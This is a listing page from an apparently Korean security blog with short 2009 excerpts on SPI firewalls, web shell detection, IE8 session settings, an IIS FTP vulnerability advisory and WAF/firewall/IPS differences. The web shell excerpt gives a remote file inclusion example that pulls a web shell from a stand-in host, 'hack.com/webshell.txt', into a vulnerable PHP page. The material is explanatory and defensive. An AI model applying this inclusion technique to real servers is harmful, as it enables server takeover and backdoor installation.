hi.pe.kr2191 네트워크 방화벽 SPI DPI 방식 Stateful Packet Inspection (SPI) What is an SPI firewall? SPI is a basic firewalling feature that is included in standard DSL routers (e.g. SpeedTouch routers). How does SPI work? SPI works at the network layer by examining a packets header and footer in addition to ensuring the packet belongs to a valid session. When an IP packet arrives at the firewall from the Internet the firewall decides if.. 2009. 9. 4. 웹해킹 분석과 웹쉘 탐지 및 대응방법 일단 웹쉘이 서버에 업로드 되면 그 서버는 해커의 수중에 들어 갔다고 보아야 한다. 이후 해커는 다양한 방법으로 서버의 정보를 취득하고 해킹툴을 이용해서 권한 상승을 노린다. allow_url_fopen = On인 웹 페이지 취약점을 통해 다음과 같이 쉘권한을 얻을 수 있다. http://www.test.com/Test.php -----------------> http://hack.com/webshell.txt 타킷서버의 Test.php에 취약점이 존재하는 경우 hack.com에 존재하는 webshell을 불러들여 쉘 권한을 획득 한 다음 내부 서버의 정보를 모으고 백도어를 설치하고 권한 상승을 노린다. 대표적으로 구 제로보드에서 많이 발생하고 있다. 웹쉘 실행 화면 이제부터 이러한 웹쉘에 대한 대응 방.. 2009. 9. 3. IE8 Session 유지 기능 해제 방법 [증상원인] IE8의 Session유지 기능은 하나의 Internet Explorer 에서는 새로운 탭에서도 Cookie을 공유하도록 하여 사용자의 편의를 도모하였습니다. 이는 다른 타사 브라우져 역시 따르고 있는 웹 표준에 최적화되어 제작된 디자인 입니다. 하지만 일부 사용자의 경우 여러 계정의 로그온이 필요할 수 있습니다. 이러한 경우를 위하여 Microsoft는 IE을 새 창으로 추가 실행하거나, 옵션 설정 등.. 을 통하여 가능하도록 디자인 하였습니다. [해결 방법] 세션 기능 해제하는 3가지 방법 입니다. (방법중 3번째 방법을 권장 합니다.) 1. 브라우저의 새 세션 메뉴 이용 방법입니다. 2. 옵션 사용 시작 - 모든프로그램(프로그램) -> Internet explorer 마우스 오른쪽 클릭.. 2009. 9. 3. MS IIS FTP 서비스의 원격코드실행 취약점 주의 □ 개요 o 마이크로소프트사의 IIS(Internet Information Service) 5.0, 5.1, 6.0에서 동작하는 FTP서비스에 원격코드실행 취약점이 발견됨[1,2,3] o 현재 해당 취약점을 이용한 공격코드가 공개되었으며 IIS는 국내에서 많이 이용되기 때문에 해당 서버 관리자는 보안 업데이트가 발표되기 전까지 주의를 요함 □ 영향을 받는 시스템 o Microsoft Internet Information Services 5.0 with Microsoft Windows 2000 SP4 o Microsoft Internet Information Services 5.1 with Windows XP SP2 and SP3 o Microsoft Internet Information Services .. 2009. 9. 3. WAF(웹-방화벽) vs FW(침입차단시스템) vs IPS(침입방지시스템) 구분 차이점 웹 애플리케이션 방화벽 (WAF) ◦네트워크 Layer 7(Application Level)계층 에서 HTTP(80) Protocol을 Base로 하는 취약점 공격만 탐지 및 차단 ◦HTTP(80)으로 시도되는 DOS, DDoS 공격 차단 ◦보호대상 : 웹 서비스를 하는 모든 웹서버 침입차단 시스템 (FW) ◦네트워크 Layer 3(Network Level) 계층에서 IP 와 Port를 제어함으로써 인가된 사용자에 대해서만 전산시스템에 접근 허용 하며 비인가 IP와 Port는 차단 ◦Routing mode에서 NAT(주소변환) 기능 제공 ◦보호대상 : 모든 서버 침입방지 시스템 (IPS) ◦네트워크 Layer 3 ~ Layer 7 계층에서 IPS가 가지고 있는 취약점 패턴에 대해서만 탐지 및.. 2009. 9. 3. 이전 1 ··· 351 352 353 354 355 356 357 ··· 439 다음
